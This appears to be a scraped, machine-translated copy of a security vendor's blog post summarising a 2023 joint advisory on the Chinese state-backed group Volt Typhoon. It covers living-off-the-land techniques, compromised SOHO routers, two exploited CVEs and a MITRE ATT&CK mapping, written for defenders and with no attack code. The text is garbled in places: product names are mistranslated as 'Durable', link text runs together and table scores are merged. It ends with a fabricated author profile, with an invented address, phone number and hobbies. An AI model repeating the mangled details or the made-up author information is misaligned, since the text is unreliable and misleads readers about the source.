Volt Typhoon: International Cyber ​​Security Authorities Detail Activity Linked to Chinese State-Sponsored Threat Actor (2023)

Volt Typhoon: International Cyber ​​Security Authorities Detail Activity Linked to Chinese State-Sponsored Threat Actor

Several international cybersecurity authorities from the US, UK, Australia, Canada and New Zealand are issuing a joint advisory detailing tactics, techniques and procedures used in recent attacks by a Chinese state-sponsored threat actor.


On May 24, several international agencies - including the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA) of the United States, the Australian Cyber ​​​​Security Center (ACSC), the Communications Security Establishment's Canadian Center for Cyber ​​Security (CCCS), New Zealand National Cyber ​​Security Center (NCSC-NZ) and UK National Cyber ​​Security Center (NCSC-UK) - issued ajoint cyber security advisory (CSA), AA23-144a, on Volt Typhoon, a state-sponsored threat actor from the People's Republic of China (PRC). In addition to the joint CSA, Microsoft's Threat Intelligence Teampublished a separate blog postwhich also highlights activity associated with Volt Typhoon.


The following are some of the key points described in the joint cybersecurity advisory:

Where does the name "Volt Typhoon" come from?

It is part of a newnaming conventionused by Microsoft.

How long has the Volt Typhoon been in operation?

Reports suggest the group has been active since "at least 2021."

What are some of the geographic regions and industries that Volt Typhoon is targeting?

In both the joint CSA and Microsoft's blog post, Volt Typhoon has been observed targeting critical infrastructure organizations in the United States as well as the US island territory of Guam.

What is notable about Volt Typhoon's activity?

The threat actor has a strong focus on "stealth" activity, using what is known as living-off-the-land (LOTL) techniques and hands-on-keyboard activity.

LOTL techniques include the use of legitimate network tools preloaded on operating systems to mask their activities, such ascertutil,ntdsutil,xcopyand more. Hands-on keyboard, as the name suggests, involves a human attacker manually executing commands on a compromised system with "hands-on-keyboard" instead of using automated or programmed tools. These techniques are used by threat actors to avoid detection by common security solutions such as endpoint detection and response (EDR).

Volt Typhoon is known to focus primarily on espionage and information gathering, and the group's recent activity has centered around critical infrastructure, prompting the joint CSA to alert defenders to the threat actor's activity as well as their tactics, techniques and procedures.

Does Volt Typhoon use other techniques to hide their activity?

Yes, CSA notes the group's use of Small-Office-Home-Office (SOHO) devices as a source of obfuscation, such as a variety of devices from different vendors, including:

  • ASUS
  • Cisco RV
  • Draytek Vigor
  • Fortinet Fortigate
  • Netgear Prosafe
  • Zyxel USG

The group uses these compromised SOHO devices to proxy network traffic in an attempt to appear as legitimate network activity. Although no information was provided on how these devices were compromised, we strongly recommend ensuring that all SOHO devices are kept up to date with the latest security patches.

In addition, if these devices have been configured to publicly expose their management interfaces, you should follow the vendors' recommendations on how to secure these configurations or disable remote access to these devices where possible.

How does Volt Typhoon gain initial access to targeted organizations?

Leveraging Internet-facing assets such as Fortinet Fortiguard appliances, ManageEngine ADSelfService Plus, and FatPipe's WARP, IPVPN, and MPVPN products.

Does Volt Typhoon exploit any known vulnerabilities?

Yes, the joint CSA highlights two vulnerabilities in ManageEngine and FatPipe products that have been linked to Volt Typhoon. The agencies note that the vulnerabilities exploited by the threat actor include, but are not “limited to” the following:

CVE-2021-40539ManageEngine ADSelfService Plus Authentication Bypass Vulnerability9.89.2
CVE-2021-27860FatPipe WARP, IPVPN, MPVPN Unlimited dangerous type file upload8.87.4

*Please note: Tenable's Vulnerability Priority Rating (VPR) scores are calculated each night. This blog post was published on May 25 and reflects the VPR at that time.

Are there other vulnerabilities used by Volt Typhoon?

While Microsoft's blog post notes that Volt Typhoon targets Fortinet Fortiguard devices, no specific CVEs were mentioned. However, we know that Fortinet devices are apopular targetfor APT groups, includingAPT5, and there have been some activity links recentlyChinese threat actorsfor several Fortinet errors, such asCVE-2022-42475andCVE-2022-41328. However, we cannot definitively link these vulnerabilities to Volt Typhoon activity.

Historically, state-sponsored threat actors in China have exploited known vulnerabilities for years at a time, as shown in similar, older communications identified asU/OO/179811-20from 2020 onwardsAA22-279Afrom 2022. For example, CVE-2021-40539, mentioned earlier, is shown in AA22-279A. In addition, a flash warning issued by the FBI in November 2021,AC-000155-MW, discussed a zero-day vulnerability in FatPipe that was eventually assigned CVE-2021-27860. In the flash alert, the FBI describes its use of an APT actor dating back to "at least May 2021" along with the implantation of webshells on vulnerable devices.

As we outlined in our2022 Threat Landscape Report, known and exploitable vulnerabilities continue to be favored by a number of threat actors. Identifying and remediating vulnerabilities with readily available proof-of-concept (PoC) code should remain a top priority for any organization to reduce your exposure.

Does Volt Typhoon use malware?

According to Microsoft's blog post, the group rarely uses malware, but appears to prefer to rely on LOTL methods through the use of legitimate tools in an attempt to steal credentials as part of post-compromise activity.

Is Volt Typhoon targeting Active Directory?

Yes, the threat actor attempts to extract credentials from Active Directory (AD), as well as make a copy of the ntds.dit database. With a copy of ntds.dit, the threat actor can exfiltrate the database and use password cracking tools to compromise additional user accounts while remaining stealthy.

Proof of concept

Of the two vulnerabilities listed in the CSA, publicly available PoC exploit code only exists forCVE-2021-40539.

Identification of affected systems

A list of Tenable plugins to identify the two vulnerabilities highlighted in the CSA can be foundher. This link uses a search filter to ensure that all matching plugin coverage is displayed when it is released. We also recommend scanning for and remedying thesetop 20 CVEsknown to be exploited by threat actors associated with China.

Volt Typhoon: International Cyber ​​Security Authorities Detail Activity Linked to Chinese State-Sponsored Threat Actor (1)

The following is a list of MITER ATT&CK techniques associated with Volt Typhoon that are mapped to Tenable Identity Exposure Indicators of Attack (IOA) as well as the associated attack path analysis techniques:

Technic IDDescriptionIndicators of attackAttack path technique
T1003.001OS Credential Dumping: LSASS memoryI-ProcessInjectionLsassT1003.001_Windows
T1003.003OS Credential DumpingI-NtdsExtractionT1003.003_Windows
T1047Windows Management InstrumentationN/AT1047_Windows
T1059.001Command and script interpreter: PowerShell (Windows)N/AT1059.001_Windows
T1069.001Discovery of permission groups: Local groupsI-ReconAdminsEnumT1069.001_Windows
T1069.002Discovery of permission groups: Domain groupsN/AT1069.002_Windows
T1110.003Brute Force: Password Spraying (Windows)I-PasswordSprayingT1110.003_Windows

As both Microsoft and the joint CSA point out, Volt Typhoon has been known to target and exploit Internet-facing assets for the initial compromise of networks. The external attack surface represents one of the biggest risk factors for organizations today. To minimize the risk of a breach, it is important that organizations fully understand their external attack surface and the opportunities for exploitation presented there.Durable attack surface control(formerly Tenable.asm) provides comprehensive visibility into all your Internet-connected assets, helping you better assess and manage external risks.

Additionally, the Joint CSA strongly recommends following best practices for identifying and addressing AD vulnerabilities and misconfigurations. To assist in these efforts,Durable identity exposure(formerly Tenable.ad) can be used to reduce your exposure and find and fix bugs before they become business-impacting issues.

Get more information

ConnectTenable's Security Response Teamabout the sustainable community.

Learn more aboutDurable one, Exposure Management The platform for the modern attack surface.

Volt Typhoon: International Cyber ​​Security Authorities Detail Activity Linked to Chinese State-Sponsored Threat Actor (2)

Durable Security Response Team

The Tenable Security Response Team (SRT) tracks threat and vulnerability intelligence feeds to ensure our research teams can deliver sensor coverage to our products as quickly as possible. The SRT also works to analyze and assess technical details and writes white papers, blogs and additional communications to ensure stakeholders are fully informed of the latest risks and threats. SRT provides breakdowns for the latest vulnerabilities on the Tenable blog.

Top Articles
Latest Posts
Article information

Author: Rob Wisoky

Last Updated: 25/05/2023

Views: 6336

Rating: 4.8 / 5 (48 voted)

Reviews: 95% of readers found this page helpful

Author information

Name: Rob Wisoky

Birthday: 1994-09-30

Address: 5789 Michel Vista, West Domenic, OR 80464-9452

Phone: +97313824072371

Job: Education Orchestrator

Hobby: Lockpicking, Crocheting, Baton twirling, Video gaming, Jogging, Whittling, Model building

Introduction: My name is Rob Wisoky, I am a smiling, helpful, encouraging, zealous, energetic, faithful, fantastic person who loves writing and wants to share my knowledge and understanding with you.